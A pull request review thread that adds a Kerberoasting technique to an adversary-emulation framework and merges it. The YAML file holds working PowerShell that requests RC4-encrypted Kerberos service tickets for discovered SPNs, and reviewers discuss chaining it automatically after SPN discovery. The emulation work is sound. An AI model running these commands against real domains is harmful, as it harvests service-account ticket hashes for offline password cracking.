### PR TITLE
Add "Request RC4 encrypted Kerberos TGS Service Ticket" TTP

### PR DESCRIPTION
**Pull request by w0rk3r**

### CODE REVIEW

File: credential-access/fd8f1dfe-9ab2-4a60-9f75-810472d9bb22.yml [hunk 1]
```diff
@@ -0,0 +1,18 @@
...
+tactic: credential-access
+technique:
+  id: T1558.003
+  name: "Steal or Forge Kerberos Tickets: Kerberoasting"
+platforms:
+  windows:
+    psh:
+      command: |
+        Add-Type -AssemblyName System.IdentityModel
+        New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '#{discover.spn}'
```
Comment (khyberspache) [inline credential-access/fd8f1dfe-9ab2-4a60-9f75-810472d9bb22.yml:18]: If you make this TTP use `ConvertTo-Json` in powershell or get it to format the data like `{'ServicePrincipalName': result}`, you can use the variable `#{json.T1087.002.ServicePrincipalName}` and this TTP will automatically get queued for any SPNs you discover.

Comment (khyberspache) [reply credential-access/fd8f1dfe-9ab2-4a60-9f75-810472d9bb22.yml:18]: Review my Azure TTPs for an example of how to use this.  Also the AWS TTPs will help you see how to chain these (I can show you)

File: credential-access/fd8f1dfe-9ab2-4a60-9f75-810472d9bb22.yml [hunk 2]
```diff
@@ -0,0 +1,18 @@
+id: fd8f1dfe-9ab2-4a60-9f75-810472d9bb22
+name: Request RC4 encrypted Kerberos TGS Service Ticket 
+description: Retrieves RC4 encrypted Kerberos TGS for a given SPN
```
Comment (khyberspache) [inline credential-access/fd8f1dfe-9ab2-4a60-9f75-810472d9bb22.yml:3]: The name and description here are identical. The description should be a more verbose explanation of what's happening so newer people understand why they might need this

**Review by khyberspache — CHANGES_REQUESTED** [review]
You might be able to leverage parsers to automatically chain this with the SPN discovery TTP. Let's try to make that work

**Comment by khyberspache** [comment]
@w0rk3r did you test to see if this chained properly with the `Find kerberoastable accounts`?

**Comment by w0rk3r** [comment]
I've tested them individually, but I'm going to test it

**Comment by w0rk3r** [comment]
Should be ready for merge now

**Review by khyberspache — APPROVED** [review]

**Pull request merged**